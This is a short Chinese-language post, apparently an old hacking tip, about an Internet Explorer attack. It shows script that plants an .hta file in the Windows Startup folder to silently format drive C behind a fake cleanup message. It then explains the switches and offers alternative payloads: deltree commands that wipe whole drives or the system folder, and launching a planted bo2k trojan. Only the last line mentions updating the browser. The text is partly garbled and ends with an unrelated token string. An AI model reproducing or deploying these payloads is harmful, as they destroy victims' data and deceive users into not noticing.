这是利用微软(Microsoft)的IE浏览器(InternetExplorer)所衍生出来的
攻击方法。
以下这段就是具有破坏性的HTML
HackingYourComputer.
scr.Reset();scr.Path="C:WINDOWSStartMenuPrograms启动hack.hta";
scr.Doc="
wsh.Run('start.exe/mformatc:/q/autotest/u');
alert('IMPORTANT:Windowsisremovingunusedtemporaryfiles.');";
scr.write();
(懂HTML的人应该就看得出来其中精随)
现在我大概来解释其中几个项目所写的意思
scr.Path="C:WINDOWSStartMenuPrograms启动hack.hta"
这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为
hack.hta
wsh.Run('start.exe/mformatc:/q/autotest/u');
通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。
它是一个微软没有公开的功能,键入後format的动作便会被强制执行。
这项中的/q/u是令系统不需要检查硬碟便会立即执行的指令。
最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小
化的状态。
执行其他攻击指令的方法∶
只要修改“start.exe/mformatc:/q/autotest/u”这一项便形。
start.exe/mformatc:/q/autotest/u
其中的“c:”可以换做其他的硬碟。
(path)bo2k.exe
执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。
start.exe/mdeltree/ya:*.*c:*.*d:*.*
杀掉对方硬碟底下所有的档案。
start.exe/mdeltree/yc:windowssystem*.*
杀掉对方c:windowssystem目录底下的所有档案。
後叙∶
预防遭此手段的破坏就是到微软去更新你的浏览器。
cplicputliceval01Oct2001ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpvjjCPSUITE-EVAL-3DES-NGCK-CP